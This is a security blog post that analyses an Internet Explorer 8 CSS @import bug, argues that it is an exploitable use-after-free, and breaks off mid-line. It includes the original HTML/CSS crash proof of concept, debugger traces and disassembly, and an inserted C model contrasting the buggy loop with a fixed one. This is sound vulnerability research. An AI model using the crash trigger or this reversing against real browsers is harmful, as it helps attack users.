When A DoS Isn't A DoS

Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/

Author: Nephi Johnson


It seems that denial-of-service (DoS) attacks are in the news nearly every day, including the recent buzz about a DoS vulnerability in Internet Explorer 8 that surfaced on Full-Disclosure. Some claimed it was exploitable (such as VUPEN), but most claimed it either wasn't exploitable or would be very hard to exploit. In this post I'm going to show that this particular vulnerability is not a DoS, nor is it impossible to exploit. (Note: I'll be using IE8 patched up to MS10-071 on XP SP3.)

Understanding the Vuln

The original proof-of-concept code that surfaced on full-disclosure looked something like this:


// HTML file
<div style="position: absolute; top:-999px; left:-999px;">
<link href="css.css" rel="stylesheet" type="text/css"/>

// CSS file (css.css)
*{
color: red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");

Loading the HTML above in IE8 results in a crash:


// Error

(4ec.e8): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00237160 ecx=00730063 edx=696c413c esi=00000002 edi=0017b484
eip=3ced638a esp=0161dbf8 ebp=0161dc04 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000202
mshtml!CSharedStyleSheet::Notify+0x1d:
3ced638a 83791801        cmp     dword ptr [ecx+18h],1 ds:0023:0073007b=????????

// Disassembly around crash

3ced6388 8b0f            mov     ecx,dword ptr [edi]
3ced638a 83791801        cmp     dword ptr [ecx+18h],1 ds:0023:0073007b=????????
3ced638e 0f8442222500    je      mshtml!CSharedStyleSheet::Notify+0x23 (3d1285d6)
3ced6394 4e              dec     esi
3ced6395 83c704          add     edi,4
3ced6398 eb24            jmp     mshtml!CSharedStyleSheet::Notify+0x33 (3ced63be)
3ced639a 85c0            test    eax,eax

The first things you might notice are that ecx has the value 00730063 ("cs" as UTF-16) and that it comes directly from the name of the CSS file ("css.css"). You'll also note that ecx was loaded from a dereferenced edi. Looking at the memory surrounding edi, you should see something like this:


// Memory: edi

0017b484  63 00 73 00 73 00 00 30 74 23       c.s.s..0t#
0017b48f  00 52 32 9a ea 00 01 0c ff 0e 00    .R2........
0017b49a  00 00 63 00 73 00 73 00 2e 00 63    ..c.s.s...c
0017b4a5  00 73 00 73 00 00 00 00 00          .s.s.....
0017b4b0  56 32 9a ea 00 01 0c ff 0e 00 00    V2.........
0017b4bb  00 63 00 73 00 73 00 2e 00 63 00    .c.s.s...c.
0017b4c6  73 00 73 00 00 00 00 00 00 5a       s.s.......Z
0017b4d1  32 9a ea 00 01 0c ff 0e 00 00 00    2..........
0017b4dc  63 00 73 00 73 00 2e 00 63 00 73    c.s.s...c.s
0017b4e7  00 73 00 00 00 00 00 00 5e 32       .s.......^2
0017b4f2  9a ea 00 01 0c ff 0e 00 00 00 63    ..........c
0017b4fd  00 73 00 73 00 2e 00 63 00 73 00    .s.s...c.s.
0017b508  73 00 00 00 00 00 62 32 9a          s.....b2.
0017b513  ea 00 01 0c ff 0e 00 00 00 63 00    .........c.
0017b51e  73 00 73 00 2e 00 63 00 73 00 73    s.s...c.s.s

Now that we know slightly more about the vuln, let's open up IE, attach to it, and set a breakpoint on mshtml!CSharedStyleSheet::Notify before we load the proof of concept. Stepping through the CSharedStyleSheet::Notify function, you'll see that edi originally points to an array of pointers to CStyleSheet objects. You'll also notice that esi ends up holding the value 0x5, which is the number of elements in the array edi points to, as well as the number of style sheet declarations (the link in the HTML and the four @imports in the CSS):


// Disassembly of mshtml!CSharedStyleSheet::Notify

mshtml!CSharedStyleSheet::Notify:
3ced63a5 8bff            mov     edi,edi
3ced63a7 55              push    ebp
3ced63a8 8bec            mov     ebp,esp
3ced63aa 51              push    ecx
3ced63ab 56              push    esi
3ced63ac 8bb1d0000000    mov     esi,dword ptr [ecx+0D0h]   ; esi = 0x14 (byte length of the array)
3ced63b2 57              push    edi
3ced63b3 8bb9d8000000    mov     edi,dword ptr [ecx+0D8h]   ; pointer to array of CStyleSheet pointers
3ced63b9 33c0            xor     eax,eax
3ced63bb c1ee02          shr     esi,2                      ; esi = 0x5 (element count)

// Memory: edi (array of pointers to CStyleSheet objects)

028a9368 00235c98
028a936c 00235680
028a9370 002352c0
028a9374 00235a40
028a9378 00235338

// Memory: poi(edi) - first element in array

00235c98  3cf76248 mshtml!CStyleSheet::`vftable'
00235c9c 00000002
00235ca0 00000010
00235ca4 00000000
00235ca8 00000000
00235cac 08000000
00235cb0 00000002
00235cb4 00000000
00235cb8 022d7278
00235cbc 00000000
00235cc0 022d5ee0
00235cc4 022d5fa0
00235cc8 00236c48
00235ccc 00000000
00235cd0 00000000

Stepping farther down, we enter a loop that iterates through each of the pointers in the array pointed to by edi. At the top of this loop esi is tested, and the jg only jumps back into the loop body while esi is greater than zero; once esi reaches zero the function cleans up and returns:


3ced63be 85f6            test    esi,esi
3ced63c0 7fc6            jg      mshtml!CSharedStyleSheet::Notify+0x1b (3ced6388)
3ced63c2 5f              pop     edi
3ced63c3 5e              pop     esi
3ced63c4 59              pop     ecx
3ced63c5 5d              pop     ebp
3ced63c6 c20400          ret     4

Inside this loop is the instruction at which the PoC crashed. On the first iteration, however, edi still points to a valid CStyleSheet pointer, so nothing crashes. We do learn that the dword at [ecx+18h] is a flag which either causes IE to branch off and call mshtml!CStyleSheet::Notify on that sheet, or merely continue the loop:


3ced6388 8b0f            mov     ecx,dword ptr [edi]
3ced638a 83791801        cmp     dword ptr [ecx+18h],1 ds:0023:00235cb0=00000002
3ced638e 0f8442222500    je      mshtml!CSharedStyleSheet::Notify+0x23 (3d1285d6)

// If dword ptr [ecx+18h] == 1
3d1285d6 8b4508          mov     eax,dword ptr [ebp+8]
3d1285d9 e8d4921200      call    mshtml!CStyleSheet::Notify (3d2518b2)
3d1285de e9b7dddaff      jmp     mshtml!CSharedStyleSheet::Notify+0x2b (3ced639a)

// Else, continue the loop
3ced6394 4e              dec     esi                        ; decrement our loop counter
3ced6395 83c704          add     edi,4                      ; advance the CStyleSheet array pointer
3ced6398 eb24            jmp     mshtml!CSharedStyleSheet::Notify+0x33 (3ced63be)   ; restart loop

Below is some pseudo-code of what is happening:


// count = [this+0D0h] / 4, sheets = [this+0D8h]; both are read once, before the loop
for (n = count, p = sheets; n > 0; n--, p++) {
    if ((*p)->flag == 1) {        // the dword at +18h of the CStyleSheet
        (*p)->Notify(arg);        // p and n are never refreshed after this call
    }
}

If you continue stepping through a second iteration of the loop in mshtml!CSharedStyleSheet::Notify, you'll notice that after the call to mshtml!CStyleSheet::Notify, edi no longer points at an array of CStyleSheet pointers. edi itself has only advanced by 4, but the memory it now points at holds the middle of the stylesheet's name (the UTF-16 "css.css"); the block that held the array has been reused during the call. That is why the next mov ecx,[edi] loads 00730063 ("cs") and the cmp on [ecx+18h] faults:


BEFORE                      | AFTER
// Memory: edi              | // Memory: edi
                            |
028a9368  00235c98          | 028a936c  00730063
028a936c  00235680          | 028a9370  002e0073
028a9370  002352c0          | 028a9374  00730063
028a9374  00235a40          | 028a9378  00000073
028a9378  00235338          | 028a937c  002108b0
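The loop above is a textbook iterator-invalidation bug: a count and a base pointer cached in registers, and a callback in the loop body that can replace the array they describe. The C model below is an added example, not code from the original post or from mshtml. The structure layouts, the sheet_notify stand-in (which rebuilds the owner's pointer array when the sheet carries @import rules) and the constructed five-sheet document are assumptions chosen to mirror the register dumps above (0x14 bytes, five pointers, a flag at +18h). It shows the cached-pointer walk going stale right after the first Notify, next to a hardened walk that re-reads base and count on every iteration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Assumed model of the objects in the disassembly, not mshtml's real layout:
 * the shared sheet keeps a byte count ([ecx+0D0h], 0x14 = five pointers) and
 * a heap array of CStyleSheet* ([ecx+0D8h]); each sheet has a flag at +18h. */
typedef struct {
    int flag;     /* 1 == notify me, mirrors cmp dword ptr [ecx+18h],1 */
    int imports;  /* number of @import rules in this sheet's CSS */
} StyleSheet;

typedef struct {
    size_t count_bytes;   /* [ecx+0D0h]: pointer count * 4 */
    StyleSheet **sheets;  /* [ecx+0D8h] */
} SharedStyleSheet;

static size_t sheet_count(const SharedStyleSheet *s) {
    return s->count_bytes / sizeof(StyleSheet *);   /* the shr esi,2 */
}

static void append_sheet(SharedStyleSheet *s, StyleSheet *sheet) {
    size_t n = sheet_count(s);
    StyleSheet **grown = realloc(s->sheets, (n + 1) * sizeof *grown);
    if (!grown) abort();
    grown[n] = sheet;
    s->sheets = grown;
    s->count_bytes = (n + 1) * sizeof *grown;
}

/* Stand-in for CStyleSheet::Notify: a sheet with @import rules makes the owner
 * rebuild its pointer array (new block allocated, old block freed), so the
 * callee replaces the array the caller is walking. In the crash dump the freed
 * block has already been reused for the UTF-16 string "css.css". */
static void sheet_notify(StyleSheet *sheet, SharedStyleSheet *owner) {
    if (sheet->imports == 0) return;
    size_t n = sheet_count(owner);
    StyleSheet **fresh = malloc(n * sizeof *fresh);
    if (!fresh) abort();
    memcpy(fresh, owner->sheets, n * sizeof *fresh);
    free(owner->sheets);
    owner->sheets = fresh;
}

/* The walk in the disassembly: count (esi) and base (edi) are loaded once and
 * never refreshed. Reading freed memory is undefined behaviour, so this version
 * checks before each dereference that the cached pointer is still inside the
 * live array; it returns -1 at the first iteration that would have read freed
 * memory, otherwise the number of sheets visited. */
static int notify_unsafe(SharedStyleSheet *s) {
    size_t esi = sheet_count(s);
    StyleSheet **edi = s->sheets;
    int visited = 0;
    while (esi > 0) {                                   /* test esi,esi / jg */
        uintptr_t lo = (uintptr_t)s->sheets, p = (uintptr_t)edi;
        if (p < lo || p >= lo + s->count_bytes) return -1;  /* edi is dangling */
        StyleSheet *sheet = *edi;                       /* mov ecx,[edi] */
        if (sheet->flag == 1) sheet_notify(sheet, s);   /* cmp [ecx+18h],1 */
        visited++;
        esi--;                                          /* dec esi */
        edi++;                                          /* add edi,4 */
    }
    return visited;
}

/* Hardened walk: index through the owner and re-read base and count on each
 * iteration, so a rebuild inside Notify cannot leave a dangling pointer. */
static int notify_safe(SharedStyleSheet *s) {
    int visited = 0;
    for (size_t i = 0; i < sheet_count(s); i++) {
        if (s->sheets[i]->flag == 1) sheet_notify(s->sheets[i], s);
        visited++;
    }
    return visited;
}

/* Constructed document in the PoC's shape: a <link> sheet whose CSS has
 * n_imports @import rules, plus one sheet per import, all flagged. */
static SharedStyleSheet *build_document(int n_imports) {
    SharedStyleSheet *s = calloc(1, sizeof *s);
    if (!s) abort();
    for (int i = 0; i <= n_imports; i++) {
        StyleSheet *sheet = calloc(1, sizeof *sheet);
        if (!sheet) abort();
        sheet->flag = 1;
        sheet->imports = (i == 0) ? n_imports : 0;
        append_sheet(s, sheet);
    }
    return s;
}

static void free_document(SharedStyleSheet *s) {
    for (size_t i = 0; i < sheet_count(s); i++) free(s->sheets[i]);
    free(s->sheets);
    free(s);
}

int main(void) {
    SharedStyleSheet *doc = build_document(4);           /* link + four @imports */
    printf("unsafe walk: %d\n", notify_unsafe(doc));     /* -1: edi went dangling */
    printf("safe walk: %d\n", notify_safe(doc));         /* 5 */
    free_document(doc);
    return 0;
}
```

The unsafe walk reports -1 instead of faulting only because it compares its cached pointer against the live array before every dereference, which is exactly the check the real loop lacks. Whether the stale read then crashes immediately or wanders through reused memory depends on what the allocator put in the freed block, which is why the register contents differ between the two IE runs shown above; running IE under PageHeap (gflags +hpa) makes the first stale access fault deterministically.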

To get a feel for why this is happening, stepping into mshtml! CStyleSheet: Notify and breaking on each call/return shows that we are reconstructing and initializing a CStyleSheet object:


0:008> pct
3d1285d9 e8d4921200      call    mshtml!CStyleSheet::Notify (3d25
